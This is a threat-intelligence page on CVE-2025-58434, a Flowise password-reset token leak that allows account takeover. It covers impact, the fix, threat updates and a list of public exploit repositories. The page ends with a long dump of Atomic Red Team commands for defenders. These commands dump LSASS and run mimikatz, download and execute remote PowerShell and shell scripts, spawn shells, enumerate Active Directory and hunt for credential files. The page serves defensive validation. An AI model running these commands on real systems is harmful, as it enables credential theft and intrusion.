CVE-2025-58434
Overview
This vulnerability is an authentication bypass affecting the password reset mechanism in FlowiseAI Flowise versions 3.0.5 and earlier. The root cause is the unauthenticated exposure of the `forgot-password` API endpoint, which returns a valid password reset temporary token (`tempToken`) without verifying the requester's identity. This flaw exists in both cloud and self-hosted deployments exposing the same API endpoint.
Vulnerability Description
Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts.
Impact
An unauthenticated attacker with network access to the vulnerable API can generate valid password reset tokens for any user, enabling immediate account takeover. No user interaction or privileges are required (CVSS vector AV:N/AC:L/PR:N/UI:N). This leads to complete compromise of affected user accounts, risking data theft, unauthorized access, and potential lateral movement within the affected environment.
Solution
Upgrade FlowiseAI Flowise to version 3.0.6 or later, which includes commit 9e178d68873eb876073846433a596590d3d9c863 that secures the password reset endpoint. Follow the vendor advisory at https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph for detailed patch instructions. Ensure password reset tokens are never returned in API responses and are delivered only via registered email channels with strong validation mechanisms.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the Flowise platform centers around its `forgot-password` endpoint, which inadvertently exposes sensitive information, including a valid password reset token, without requiring any form of authentication or verification. This flaw allows an attacker to generate a reset token for any user, effectively enabling them to reset passwords and gain unauthorized access to user accounts. The implications of this vulnerability are severe, as it undermines the fundamental security principles of user authentication and data protection. The affected versions, specifically 3.0.5 and earlier, fail to implement necessary safeguards that would typically prevent such unauthorized access.
Attack vectors exploiting this vulnerability are straightforward and can be executed with minimal technical expertise. An attacker could leverage automated scripts or manual requests to the `forgot-password` endpoint, targeting arbitrary usernames or email addresses. Given the lack of authentication checks, the attacker can receive a valid reset token for any account, allowing them to initiate a password reset process. This exploitation can be conducted at scale, potentially affecting numerous users within an organization or service. Furthermore, the presence of this vulnerability in both cloud and self-hosted deployments amplifies the risk, as it can be exploited in various environments without the need for sophisticated tools.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the Flowise platform for sensitive operations. A successful account takeover can lead to unauthorized access to confidential data, manipulation of user settings, and even the potential for further attacks within the organization, such as data exfiltration or lateral movement within networks. The business risks associated with such breaches include reputational damage, loss of customer trust, regulatory penalties, and financial losses stemming from remediation efforts and potential legal action. Organizations must recognize that the ramifications extend beyond immediate financial costs; they can also affect long-term relationships with customers and stakeholders.
To detect and mitigate this vulnerability, organizations should implement a series of strategic measures. Firstly, it is crucial to upgrade to the latest version of Flowise, specifically version 3.0.6 or later, which addresses the vulnerability by securing the password reset endpoints. Additionally, organizations should ensure that their API responses do not return sensitive information, including reset tokens or user details, and instead provide generic success messages to prevent user enumeration. Strong validation mechanisms for the reset tokens should be enforced, including single-use tokens, short expiration times, and validation against the request origin. Logging and monitoring password reset requests for suspicious activity can also help identify potential exploitation attempts.
In conclusion, the vulnerability within the Flowise platform presents a critical security risk that organizations must address promptly. By understanding the technical details, potential attack vectors, and the associated business risks, organizations can better prepare themselves against exploitation. Implementing robust detection and mitigation strategies will not only protect user accounts but also safeguard the integrity and reputation of the organization as a whole. The proactive approach to security will be essential in maintaining trust and ensuring the resilience of systems against emerging threats.
CSURFACE threat intelligence has identified a marked escalation in the exploit landscape surrounding CVE-2025-58434, driven by the emergence of multiple new public proof-of-concept (PoC) exploits hosted on GitHub. These PoCs not only demonstrate the vulnerability’s feasibility but also combine CVE-2025-58434 with related flaws such as CVE-2025-59528, enabling chained attack scenarios that significantly broaden the potential impact. The availability of these tools lowers the barrier to entry for threat actors, increasing the likelihood of opportunistic and targeted account takeover attempts. Although the EPSS score remains stable, the proliferation of high-quality exploit code signals an elevated operational risk for organizations relying on FlowiseAI Flowise, as attackers can now automate and scale exploitation efforts more efficiently. This development necessitates heightened vigilance in detection capabilities and underscores the urgency of addressing the vulnerability to mitigate the growing threat of unauthorized access and subsequent compromise.
Update 2 — May 15, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2025-58434, evidenced by a sharp increase in detection events and the publication of a new ExploitDB entry. This development coincides with a substantial rise in the Exploit Prediction Scoring System (EPSS) score, now placing the vulnerability in the top percentile for exploitation likelihood. The emergence of multiple new proof-of-concept exploits, including chained attack demonstrations combining CVE-2025-58434 with related vulnerabilities, has broadened the exploitation landscape and lowered the technical barrier for adversaries. This expansion facilitates more automated and scalable attack campaigns, increasing the risk of widespread account takeovers within environments running vulnerable versions of FlowiseAI Flowise. For defenders, this means heightened operational risk and a pressing need to enhance detection capabilities, as threat actors are rapidly adopting these tools to conduct opportunistic and targeted intrusions. The overall threat level has escalated from high to critical, reflecting the convergence of increased exploitation activity, accessible exploit code, and accelerating attack trends.
Update 3 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-58434, accompanied by the emergence of new, publicly available proof-of-concept exploits that combine this vulnerability with others to achieve remote code execution and privilege escalation. Our telemetry indicates that adversaries are increasingly leveraging these chained exploits to automate account takeovers and lateral movement within compromised environments. Although the EPSS score remains stable, the qualitative increase in attack sophistication and tool availability significantly amplifies the operational risk for defenders. This evolution underscores a shift from opportunistic exploitation toward more coordinated and multi-stage intrusion campaigns, elevating the threat level to critical. Defenders should anticipate more frequent and complex attack vectors exploiting this vulnerability, increasing the urgency for enhanced detection and response capabilities.
Update 4 — July 18, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2025-58434, accompanied by the emergence of new proof-of-concept exploits that integrate this vulnerability into multi-stage attack chains. Our telemetry indicates that adversaries are increasingly leveraging these sophisticated toolsets to automate account takeovers and facilitate lateral movement within compromised environments. This evolution signifies a shift from isolated opportunistic attacks to more coordinated campaigns that combine CVE-2025-58434 with other vulnerabilities to achieve remote code execution and privilege escalation. Although the EPSS score remains stable, the qualitative surge in exploitation complexity and attacker capability substantially elevates the operational risk for defenders. This heightened threat environment demands increased vigilance, as attackers are now more capable of executing persistent, multi-vector intrusions that can severely disrupt affected organizations.
Update 5 — July 25, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2025-58434, accompanied by a modest decline in the EPSS score. Despite this downward trend in probabilistic exploit prediction, our telemetry indicates a qualitative intensification in attacker activity, particularly in the use of multi-stage attack chains that combine this vulnerability with others to achieve full remote code execution and lateral movement. The emergence of additional proof-of-concept exploits and detailed attack walkthroughs underscores growing adversary sophistication and operational capability. This shift elevates the threat landscape from opportunistic exploitation toward more coordinated, persistent campaigns, increasing the likelihood of successful account takeovers and subsequent system compromise. Consequently, the overall risk level for defenders remains critically high, necessitating sustained vigilance despite the slight decrease in EPSS metrics.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Flowiseai | Flowise | All |
cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Flowise < 3.0.5 - Missing Authentication for Critical Function | andersoncezar048 | webapps | typescript | - | View |
GitHub PoCs (18)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
kartik2005221/CVE-2025-58434-AND-59528-POC
Combined PoC for CVE-2025-28434 and CVE-2025-59528
|
kartik2005221 | 17 | 0 | 2026-04-13 | View |
|
karimelsheikh1/HTB-Silentium-Writeup
Hack The Box - Silentium machine writeup | CVE-2025-58434, CVE-2025-59528, CVE-2025-8110
|
karimelsheikh1 | 4 | 1 | 2026-04-22 | View |
|
TYehan/CVE-2025-58434-59528
CVE-2025-58434 and CVE-2025-59528 chain POC - FlowiseAI Remote Code Execution
|
TYehan | 5 | 0 | 2026-04-12 | View |
|
AzureADTrent/CVE-2025-58434-59528
CVE-2025-58434 and CVE-2025-59528 chain POC
|
AzureADTrent | 4 | 0 | 2026-04-12 | View |
|
jwsly12/CVE-2025-58434-59528-htb-ctf
Exploitation Silentium HTB-CTF
|
jwsly12 | 2 | 0 | 2026-04-12 | View |
|
Twappz/HTB-Silentium-Writeup
Hack The Box - Silentium machine writeup | CVE-2025-58434, CVE-2025-59528, CVE-2025-8110
|
Twappz | 0 | 1 | 2026-05-09 | View |
|
0xDaeras/Flowise-CVE-2025-58434-Chain-59528
FlowiseAI CVE-2025-58434 & CVE-2025-59528 exploit PoC, demonstrating unauthenticated ATO via reset token leakage, follow...
|
0xDaeras | 1 | 0 | 2026-05-07 | View |
|
SteamPunk424/CVE-2025-58434-Unauthenticated-Password-Reset-Flowwise
The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without...
|
SteamPunk424 | 1 | 0 | 2026-04-20 | View |
|
r3nsi15/Flowise-CVE-2025-58434-PasswordReset
Unauthenticated password reset exploit for Flowise AI ≤ 3.0.5. Abuses the /api/v1/account/forgot-password endpoint to ch...
|
r3nsi15 | 1 | 0 | 2026-04-15 | View |
|
CVETeam/FlowiseAI-Critical-KillChain
Critical unauthenticated kill chain leading to full RCE in FlowiseAI (CVE-2025-58434 + CVE-2025-59528)
|
CVETeam | 1 | 0 | 2026-04-12 | View |
|
kartik2005221/CVE-2025-58434-poc
|
kartik2005221 | 1 | 0 | 2026-04-12 | View |
|
00lucasm/CVE-2025-58434-Flowiseai-Auth-Bypass-PoC
Flowiseai Flowise Auth Bypass Vulnerability Proof of Concept
|
00lucasm | 0 | 0 | 2026-06-26 | View |
|
SuriyaBoon/HackTheBox-Silentium
Full walkthrough of HackTheBox "Silentium" (Medium/Linux). Chains three CVEs: CVE-2025-58434 leaks a Flowise password re...
|
SuriyaBoon | 0 | 0 | 2026-06-01 | View |
|
vincent-vbg/CVE-2025-58434-PoC
This repository contains a Proof of Concept (PoC) Python script for CVE-2025-58434, which enables attackers to change pa...
|
vincent-vbg | 0 | 0 | 2026-05-16 | View |
|
mananispiwpiw/CVE-2025-58434-PoC
CVE-2025-58434 Proof of Concept
|
mananispiwpiw | 0 | 0 | 2026-05-08 | View |
|
honney336/CVE-2025-58434_CVE-2025-59528
CVE-2025-58434 Flowise <= 3.0.5 and earlier allows account takeover via unauthenticated forgot-password token. CVE-2025...
|
honney336 | 0 | 0 | 2026-04-14 | View |
|
p1ctur3p3rf3ct/CVE-2025-58434
CVE-2025-58434 PoC
|
p1ctur3p3rf3ct | 0 | 0 | 2026-04-12 | View |
|
Kamigold/Flowise-RCE
CVE-2025-58434 & CVE-2025-59528
|
Kamigold | 0 | 0 | 2026-04-12 | View |
Threat Feed
15 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
